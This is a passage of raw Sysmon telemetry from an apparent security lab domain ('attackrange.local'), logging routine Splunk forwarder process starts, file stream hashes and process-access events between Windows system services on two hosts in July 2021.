Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000805741Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:25.592{0C1E0330-F261-60EB-2F79-00000000D001}2064C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000805740Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:25.310{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=97F2B168C86320EFAB6765726DA9879C,SHA256=8DA23FA57D51BDE0EF9822DF3E68F7DDE52CB1E8B744F93571A7D9DCE5931AE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805739Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:25.310{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=39708B4C01F50225A54CBA928464A82C,SHA256=E4D431FB905A8819EE79EB450B62805FED4AA730FC8268599AE220F0A0BC0F3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805738Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:25.153{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5482F1930A126F34B5F48F4F413C93F4,SHA256=A89AB223572E20AE4930BE4C6E4CD25D60D2F3571589DAD75EF616379AD2012A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045511Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:42:25.349{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECE6EEEC0E335AA996DD62EAB2F363A8,SHA256=C5E666CCF702956E538BBB30ABA9688CA43B05D83A229651DDEAB4EBA5DEDBFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045512Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:26.364{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EF1F6933CC3BF0A125E650B942FF69C,SHA256=71AF93F7681B2F9E0830E803E5512472654E471DEBF1E28E8C5DFCB4C4689D7E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000805781Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.966{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F262-60EB-3179-00000000D001}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805780Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:26.966{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805779Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.966{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805778Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:26.966{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805777Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.966{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805776Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:26.966{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805775Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.966{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805774Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:26.966{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805773Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.966{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805772Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:26.966{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805771Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.966{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F262-60EB-3179-00000000D001}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000805770Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.966{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F262-60EB-3179-00000000D001}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000805769Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.951{0C1E0330-F262-60EB-3179-00000000D001}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000805768Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.622{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=97F2B168C86320EFAB6765726DA9879C,SHA256=8DA23FA57D51BDE0EF9822DF3E68F7DDE52CB1E8B744F93571A7D9DCE5931AE9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000805767Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:26.294{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F262-60EB-3079-00000000D001}1624C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805766Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.294{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805765Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:26.294{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805764Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.278{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805763Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:26.278{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805762Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.278{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805761Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:26.278{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805760Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.278{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805759Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:26.278{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805758Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 